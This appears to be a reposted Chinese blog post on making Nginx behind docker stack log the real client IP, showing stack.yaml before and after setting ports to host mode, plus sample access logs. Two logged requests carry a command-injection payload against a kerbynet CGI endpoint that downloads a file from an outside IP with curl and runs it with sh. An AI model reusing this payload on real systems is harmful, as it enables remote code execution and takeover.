本文共 1919 字,大约阅读时间需要 6 分钟。
Nginx通过docker stack 部署的代理后端服务,接口调用时获取不到实际的ip地址,remote_addr是容器的ip地址,查阅资料有几种方式(network_mode, ports映射, firewall...),但是都不是很完美,最后使用ports模式定义为host的有效,但是该方式对于docker stack 部署的有局限性,端口映射到宿主机,一个宿主机只能运行一个副本,同一个宿主机不能运行多个副本,会导致端口冲突。
未改造前stack.yaml
...省略 nginx: image: nginx volumes: - ./nginx/conf.d:/etc/nginx/conf.d - ./nginx/nginx.conf:/etc/nginx/nginx.conf - ./nginx/ssl:/etc/nginx/ssl - ./nginx/log:/var/log/nginx - /etc/localtime:/etc/localtime ports: - 80:80 - 443:443 ....省略
改造后
...省略 nginx: image: nginx volumes: - ./nginx/conf.d:/etc/nginx/conf.d - ./nginx/nginx.conf:/etc/nginx/nginx.conf - ./nginx/ssl:/etc/nginx/ssl - ./nginx/log:/var/log/nginx - /etc/localtime:/etc/localtime ports: - target: 80 published: 80 protocol: tcp mode: host - target: 443 published: 443 protocol: tcp mode: host ...省略
日志:
// 改造前10.0.0.2 [13/Oct/2020:00:08:33 +0000] "GET / HTTP/1.1" 400 85 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"10.0.0.2 [13/Oct/2020:00:52:48 +0000] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 400 74 "-" "-"10.0.0.2 [13/Oct/2020:00:52:48 +0000] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 400 74 "-" "-"// 改造后193.27.228.27 [13/Oct/2020:01:15:18 +0000] "POST /api/jsonws/invoke HTTP/1.1" 400 85 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"112.255.82.99 [13/Oct/2020:01:16:22 +0000] "GET /news/list?pageNum=1&pageSize=10 HTTP/1.1" 200 449 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0"
转载地址:http://yspef.baihongyu.com/